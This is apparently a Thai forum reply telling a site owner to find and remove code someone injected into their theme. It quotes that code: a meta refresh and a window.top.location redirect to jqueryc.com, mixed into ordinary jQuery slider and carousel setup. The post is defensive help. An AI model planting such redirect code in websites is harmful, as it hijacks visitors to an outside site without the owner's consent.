ไม่ได้โดนไวรัสหรอกครับ แต่มีคนยัดโค้ดนี้มาให้ท่านลองไปหาในธีมดูครับแล้วลบ
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"/>
<meta http-equiv="refresh" content="0; url=http://www.jqueryc.com">
<script type="text/javascript">
window.top.location.href = "http://www.jqueryc.com";
</script>
</head>
</html>
*/
window.top.location.href = "http://www.jqueryc.com";
<script type='text/javascript'>
jQuery(window).load(function() {
jQuery('#posts-carousel').jcarousel({scroll: 4, visible: 4});
// Implementation of Nivo Slider
jQuery('#slider').nivoSlider({
effect: 'random',
pauseTime: '3000',
controlNavThumbs: true,
controlNavThumbsFromRel: true,
directionNav: false,
directionNavHide: false,
captionOpacity: 1
});
/**
* We use the initCallback callback
* to assign functionality to the controls
*/
function media_initCallback(carousel) {
jQuery('.jcarousel-control a').bind('click', function() {
carousel.scroll(jQuery.jcarousel.intval(jQuery(this).text()));
return false;
});
};
jQuery('.jcarousel-skin-media').jcarousel({scroll: 3, visible: 3});
jQuery('#navigation ul, .topNav').superfish({autoArrows: false, dropShadows: false});
});
</script>